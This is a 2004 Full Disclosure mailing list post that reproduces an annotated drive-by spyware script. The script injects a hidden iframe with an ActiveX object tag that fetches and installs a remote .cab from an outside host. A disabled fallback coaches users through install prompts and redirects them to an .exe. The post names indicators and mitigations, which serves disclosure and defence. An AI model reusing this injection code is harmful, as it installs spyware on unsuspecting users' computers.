Full Disclosure mailing list archives

Re: Spyware installs with no interaction in IE on fully patched XP SP2 box


From: Mark Shirley <mshirley () gmail com>
Date: Mon, 4 Oct 2004 11:21:49 -0400

// Page-level setup of the captured script, annotated for analysis.
//   exepath       - URL of the ATPartners.cab package. It is not read again in the code
//                   shown; the same URL is hard-coded in the object tag built below.
//   retry_enabled - set to true and not read anywhere in the code shown.
//   retry_cnt     - only referenced inside the commented-out body of retry().
// NOTE(review): the "&apos;;" that ends the exepath line is an HTML-entity artifact of the
// archive rendering (presumably a closing single quote in the served file). As rendered,
// that line is not valid JavaScript.
// The last statement runs as soon as the script is parsed: executeScript() receives the
// value of the minpopup80wu03rd cookie (null when absent), so the injection below needs no
// click or other user action to start.
var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab&apos;;      
var retry_enabled = true;
var retry_cnt=1;

executeScript(getCookie('minpopup80wu03rd'));


// executeScript(CookieExists)
// Injects a hidden iframe carrying an ActiveX object tag, unless the throttle cookie is set.
//
// CookieExists: value returned by getCookie("minpopup80wu03rd"); null means the cookie was
//               not found. Any non-null value makes the function return null immediately.
//
// When the cookie is absent, the else branch does the following, in order:
//   1. document.write() of an iframe with id "downloads_manager", styled
//      position:absolute and visibility:hidden, so nothing is rendered for the user.
//   2. Builds an HTML document (document_code, assigned without var, so an implicit global)
//      whose body is an object tag with classid clsid:00000EF1-0786-4633-87C6-1AA7A44296DA,
//      a codebase pointing at ATPartners.cab on www.addictivetechnologies.net, HEIGHT=0 and
//      WIDTH=0, an "AffiliateID" PARAM holding a URL-encoded value, and
//      onerror="window.parent.retry();" which calls retry() in the parent page.
//   3. Writes that document into the iframe and closes it. downloads_manager is not
//      declared in the code shown; it is a bare name equal to the iframe id, presumably
//      resolved through the browser mapping of element ids to globals.
//   4. Sets minpopup80wu03rd=test with a 1-day expiry, so the block is skipped on repeat
//      visits inside that window. This also means a second visit within a day will not
//      reproduce the behaviour during analysis unless the cookie is cleared.
//
// Defender notes: an object tag with classid plus codebase is how Internet Explorer is
// asked to download and install an ActiveX control that is not yet registered. The CLSID,
// the codebase host, the cab name and the cookie name are the indicators this block
// exposes. Setting the kill bit for the CLSID, blocking the host, and restricting ActiveX
// installation in the Internet zone are the usual mitigations.
//
// NOTE(review): the mail/archive software hard-wrapped several lines in this block (both
// long // comments and the string literals passed to document.write and appended to
// document_code), so the text as shown is not syntactically valid. The ";" after the
// codebase URL also looks like an archive artifact; confirm against an original capture.
function executeScript(CookieExists) {

        //Check if cookie exists, if it does we know the user has visited the
site within the last 24 hrs so don't load the script
        if (CookieExists!=null) {

                //If cookie does exists then exit
                
                return null;

                }
        else {

                //If cookie does not exist then we can assume the user has not been
to the site within the last 24 hrs
                document.write('<iframe id="downloads_manager"
style="position:absolute;visibility:hidden;"></iframe>');
                
              document_code = '<html><head>\n';
              document_code += '<\/head><body>\n';
              document_code += '<object
onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID"
VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
              document_code += '<\/body><\/html>';
              downloads_manager.document.write(document_code);
              downloads_manager.document.close();

                setCookie('minpopup80wu03rd','test',1);

                }
        }



// retry()
// Error callback named by the onerror attribute of the injected object tag
// (window.parent.retry()). In this capture every statement in the body is commented out,
// so a call does nothing.
//
// The disabled code shows a two-stage fallback:
//   - while retry_cnt > 0: clear the throttle cookie (expiry 0), show an alert telling the
//     user to click Yes, rewrite the iframe with the same object tag (here without the
//     AffiliateID PARAM and without onerror), set the cookie again and decrement retry_cnt;
//   - otherwise: show a second alert telling the user to click Open, then point
//     window.location at 80wu03rd.exe on www.NetpalOffers.net.
// Both alerts are prompts that coach the user through the browser install/download dialog.
// The .exe URL is a further indicator alongside the cab URL and CLSID.
// NOTE(review): whether this fallback was ever live cannot be told from this capture.
// NOTE(review): some commented lines were hard-wrapped by the archive, so their
// continuation lines (the classid/codebase/HEIGHT lines, the tail of the second alert and
// the .exe URL) appear outside the // comments; the ";;" after the URL looks like an
// archive artifact as well.
function retry()
{
        //if(retry_cnt>0) 
        //{
                //setCookie('minpopup80wu03rd','test',0);
                //alert("To install latest At-Games Games update, please click Yes"); 
                //document_code = '<html><head>\n';
                //document_code += '<\/head><body>\n';
                //document_code += '<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
HEIGHT=0 WIDTH=0></object>\n';
                //document_code += '<\/body><\/html>';
                //downloads_manager.document.write(document_code);
                //downloads_manager.document.close();
                //setCookie('minpopup80wu03rd','test',1);
                //retry_cnt--;
        //} else {
                        //alert("This is a 1 time install, once you click Open it will
never pop up this message again");
                        //window.location =
"http://www.NetpalOffers.net/NetpalOffers/DMOXe/80wu03rd.exe";;
        //}
}


// getCookie(NameOfCookie)
// Looks up a cookie in document.cookie and returns its unescaped value, or null when
// document.cookie is empty or the name is not found.
//
// NameOfCookie: cookie name to search for. In this sample it is only called with
//               "minpopup80wu03rd", the throttle cookie that gates executeScript().
//
// NOTE(review): the lookup is a plain substring search for NameOfCookie + "=", so it also
// matches a cookie whose name merely ends with that text. begin and end are assigned
// without var, which makes them implicit globals.
function getCookie(NameOfCookie) {

if (document.cookie.length > 0)  { 

        // Position of "name=" inside the cookie string; -1 when absent.
        begin = document.cookie.indexOf(NameOfCookie+"="); 
        if (begin != -1) { 

        // Skip past "name=" so begin points at the first character of the value.
        begin += NameOfCookie.length+1; 
        end = document.cookie.indexOf(";", begin);

        // No ";" after the value means it is the last cookie in the string.
        if (end == -1) end = document.cookie.length;
                return unescape(document.cookie.substring(begin, end)); } 
        }
        return null; 

}


// setCookie(NameOfCookie, value, expiredays)
// Writes NameOfCookie=escape(value) to document.cookie.
//
// NameOfCookie: cookie name.
// value:        cookie value; passed through escape() before being stored.
// expiredays:   lifetime in days from now. When it is null or undefined (== null) no
//               expires attribute is appended.
//
// No path, domain or other attributes are set. The sample calls this with
// ("minpopup80wu03rd", "test", 1), which gives the one-day throttle that the comments in
// executeScript() describe as 24 hrs.
function setCookie(NameOfCookie, value, expiredays) {

var ExpireDate = new Date ();
// Computed unconditionally; only used below when expiredays is not null/undefined.
ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));

document.cookie = NameOfCookie + "=" + escape(value) + 
((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

